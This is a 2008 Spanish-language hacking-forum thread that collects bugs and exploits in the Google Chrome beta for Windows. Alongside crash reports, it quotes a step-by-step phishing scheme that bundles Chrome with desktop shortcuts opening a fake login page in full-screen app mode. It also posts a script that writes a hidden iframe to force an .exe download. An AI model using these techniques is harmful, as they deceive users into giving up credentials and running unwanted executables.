elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [°] Recopilatorio de Bugs/Exploits en Google Chrome win32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: [°] Recopilatorio de Bugs/Exploits en Google Chrome win32  (Leído 51,682 veces)
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
[°] Recopilatorio de Bugs/Exploits en Google Chrome win32
« en: 3 Septiembre 2008, 00:45 am »

No se si soy yo que ando con la mala suerte pero me he encontrado con todos los contras de este nuevo explorador de google :(

acá dejo el mensaje que intenté dejar en el foro de discució de google chrome pero no pude.

Citar
1. "Debates > Sugerencias > Sugerencias y problemas d google chrome"
=> le falta una "de" :P

2. "Error 2 (net::ERR_FAILED): Error desconocido." => Eso sucede al
visitar un sitio con el protocolo FTP sin conexión, ahora cuando
ingreso "http://www.noexistolalalla%27%22%3E%3Ch1%3Ea.com/" dice
"Error 300 (net::ERR_INVALID_URL): Error desconocido.", claro, ahora
veo que la mayoría de los errores arrojados no son definidos por el
explorador pero si por la librería.

3. ¿Porque solo se lanzó para Windows y no para linux?

4. Me hace falta el botón "home" para no tener que posicionar el mouse
sobre la barradel explorador y escribir.

5. Podría haber alguna compatibilidad con addons de Firefox *.xpi para
utilizar mis complementos necesarios como noscript y cookiesedit?

6. al descargar un archivo me aparecen las opciones abajo pero no me
da la opción de "cancelar!!" y tampoco me da la opción de cancelar
todas... quepasaría si alguien me lanza una bomba de iframes hacia
archivos fakes descargables? me llenaría la bandeja de descargas sin
poder eliminarlas todas.

7. en los textboxs de los alerts de javascript podría dar la opción de
seleccionar el texto para poder copiar y pegar en caso de que se
necesite al igual que firefox en ubuntu.

------- EDITADO -------

Acabo de tener un encontrón con el explorador de google :/

Lo que hice fue pedir una url muy larga donde ovbiamente no existía y este me redireccionó hacia una pantala con el logo de google donde decía que la dirección dns no era válida, traté de ver el código fuente pero no me dejaba asi que con el botón derecho le di copiar dirección url de la imagen (logo de google) y pegué en otra pestaña y pude evr que este se localizaba en el sertvidor de google y no en mi localhost, antes de dar enter me apareció un error y se frizó causando una denegación de servicio y dandome la opción de reiniciar el explorador, no obstante me arrojó otra pantalla donde decía que no se podía cerrar la pestaña asi que me daba la opción de cerrar el explorador por completo desmintiendo el mito que decian en el video que si una pestaña fallaba entonces las demas quedaban intactas.
al reiniciar este me seguía arrojando errores y ya no puedo volver a iniciarlo con normalidad. Tube que entrar con firefox :/

AppName: chrome.exe    AppVer: 0.0.0.0    ModName: chrome.dll
ModVer: 0.2.149.27    Offset: 0005bda6

http://img148.imageshack.us/img148/6228/error003ww1.png
http://img148.imageshack.us/img148/4452/error002sp1.png

Y para rematar este foro me lanza un error y no puedo postear este tema ¬¬ tube que borrar el anterior y crearlo nuevamente.
http://img386.imageshack.us/img386/8642/error004zg8.png

Probaré desintalando :(

Las imagenes:






Estubo buena la idea de separar las ventanas por procesos pero el dr watson te mata el proceso padre asi que se terminan cerrando todas las pestañas por igual  :xD

Ahora que busco el contacto para reportar esto el sitio de google me manda a un error 404  :¬¬ y para reportar bugs debo iniciar el explorador que no quiere iniciar  :¬¬ que rabia, mejor me quedo con mi firefox, es mas estable y seguro pero no mas rápido  :P la estabilidad y seguridad no la transo por la rapidez, que se jodan los usuarios que les guste jugar mientras los mandan a chingar con DoS, yo prefiero ff.

Editado:

Cuando inicias por primera ves el chrome este te crea un archivo llamado "First Run" sin ningún contenido dentro y al reiniciarlo se iicia normal pero.. que pasa si borramos ese archivo? comienza a importar todo nuevamente y aparecen todas las vienvenidas. aunque es un poco molesto podrían haberlo hecho guardando los valores dentro del registro del sistema no?

Lo bueno de acá es que puedes editar tus mensajes si quieres añadir algo o responderte :p no como en los foros de gogle que con suerte te dejan enviar un mensaje por dia XD
« Última modificación: 25 Septiembre 2008, 15:00 pm por sirdarckcat » En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: Bug en google chrome
« Respuesta #1 en: 3 Septiembre 2008, 00:53 am »

cuek
recien salio hoy y el chabon ya estaba reportando fallos
=P
es un beta tmb
pero buee
saludos
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Bug en google chrome
« Respuesta #2 en: 3 Septiembre 2008, 04:55 am »

Por supuesto que es beta :P muchos geeks lo esperaban con la pc okm para pode buscar y buscar a maxima rapidez para ver los 3 primeros que reportaban -algo-
En línea

[/url]
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Bug en google chrome
« Respuesta #3 en: 3 Septiembre 2008, 16:34 pm »

:http://evilfingers.com/advisory/google_chrome_poc.php

-berz3k.
En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Bug en google chrome
« Respuesta #4 en: 3 Septiembre 2008, 16:39 pm »

Otro PoC en shortcuts de Win32

Have you installed the new Google chrome? Make sure you’re careful with your application shortcuts because I just thought of a very easy way to Phish basic users.

Código:

   1. Wrap the Chrome browser installation in your own InstallShield.
   2. Create a Phising Mirror of Gmail or what ever site you want to Phish.
   3. Add Desktop Shortcuts to the InstallShield which link to.
      "C:\Documents and Settings\User\Local Settings\Application Data\Google\Chrome\Application\chrome.exe"  --app=http://login.live..yourfakehotmailwebsite.com
   4. Build your InstallShield.
   5. Stick a graphic on your website that says “Get Google Chrome Now” and link to your InstallShield build.


When the user install Google chrome from your link they'll get the browser but they will also find some helpful desktop links to their Hotmail/Gmail/Ebay account.

As the Apps mode in Chrome loads in full screen with NO URL BAR (What were they thinking?). The user will happily click on the desktop links thinking it's just a handy shortcut that their friends at Google installed, not knowing it's really a link to our phishing mirror of Gmail.

fuente
:http://www.thewayithink.co.uk/post/Security-Vulnerability-with-Google-Chrome.aspx

En línea

WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Bug en google chrome
« Respuesta #5 en: 3 Septiembre 2008, 18:00 pm »

Citar
Software:
Google Chrome Browser 0.2.149.27

Tested:
Windows XP Professional SP3

Result:
Google Chrome Crashes with All Tabs

El crash que a mi me resulta es sobre la plataforma de windows xp con sp2
En línea

EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Bug en google chrome
« Respuesta #6 en: 3 Septiembre 2008, 19:08 pm »

lo probe y me parecio inestable xDDDDDDDD

salio hoy? .. o.O
LOL!

^^ hagamos un exploit?
xD
En línea

Experimental Serial Lain [Linux User]
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Bug en google chrome
« Respuesta #7 en: 3 Septiembre 2008, 20:22 pm »

Browser Automatic File Download

Exploit:

Código:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Alguien mas? exploits diferentes a los posteados? hagamos una lista XD

fuente: securiteam.com

-berz3k.


En línea

berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #8 en: 3 Septiembre 2008, 20:28 pm »

PD: Cambie el nombre del topic inicial, para mejorar el tema.

-berz3k.

« Última modificación: 3 Septiembre 2008, 20:33 pm por berz3k » En línea

it3r

Desconectado Desconectado

Mensajes: 101



Ver Perfil
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #9 en: 3 Septiembre 2008, 20:42 pm »

eh ...que mal xD! pero bueeno solo es un beta habra que esperar la final

saludos
« Última modificación: 4 Septiembre 2008, 00:31 am por it3r » En línea

Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
2 Google Bugs XSS&Redirect with using bit.ly (video)
Nivel Web
sony1a2 8 5,647 Último mensaje 4 Enero 2011, 22:26 pm
por berz3k
Bugs hunter de Google
Hacking
Panic0 0 1,878 Último mensaje 21 Octubre 2021, 18:48 pm
por Panic0
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines